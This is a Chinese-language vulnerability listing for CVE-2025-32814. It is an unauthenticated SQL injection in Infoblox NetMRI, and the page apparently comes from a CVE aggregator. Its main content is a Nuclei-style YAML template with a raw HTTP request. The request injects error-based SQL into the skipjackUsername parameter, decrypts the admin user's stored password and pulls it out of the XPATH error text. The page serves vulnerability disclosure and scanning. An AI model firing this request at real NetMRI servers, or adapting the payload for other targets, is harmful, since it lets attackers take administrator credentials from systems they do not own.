CVE-2025-32814: NetMRI Unauthenticated SQL Injection via skipjackUsername

日期: 2025-08-01 | 影响软件: NetMRI | POC: 已公开

漏洞描述

An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.

PoC代码[已公开]

id: CVE-2025-32814

info:
  name: NetMRI Unauthenticated SQL Injection via skipjackUsername
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32814
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32814
    cwe-id: CWE-89
    epss-score: 0.15521
    epss-percentile: 0.9443
    cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: infoblox
    product: netmri
    fofa-query: icon_hash="-319724102"
  tags: cve,cve2025,sqli,unauth,netmri,rails,error-based,vkev

http:
  - raw:
      - |
        GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: regex
        part: body
        name: password
        group: 1
        regex:
          - "XPATH syntax error: '~(.*?)~'"
        internal: true

      - type: dsl
        dsl:
          - "'Password: ' + password"

    matchers:
      - type: word
        part: body
        words:
          - 'XPATH syntax error:'
# digest: 4a0a00473045022100f549e32315c1fa0afcd4b1dd4a165394a698a6e846a36452f6faa8fa4104cb73022034afc84a5321dda86bc370b6e3407a31a9b8ac24d5d769cb9a689ae64d92ed91:922c64590222798bb761d5b6d8e72950

相关漏洞推荐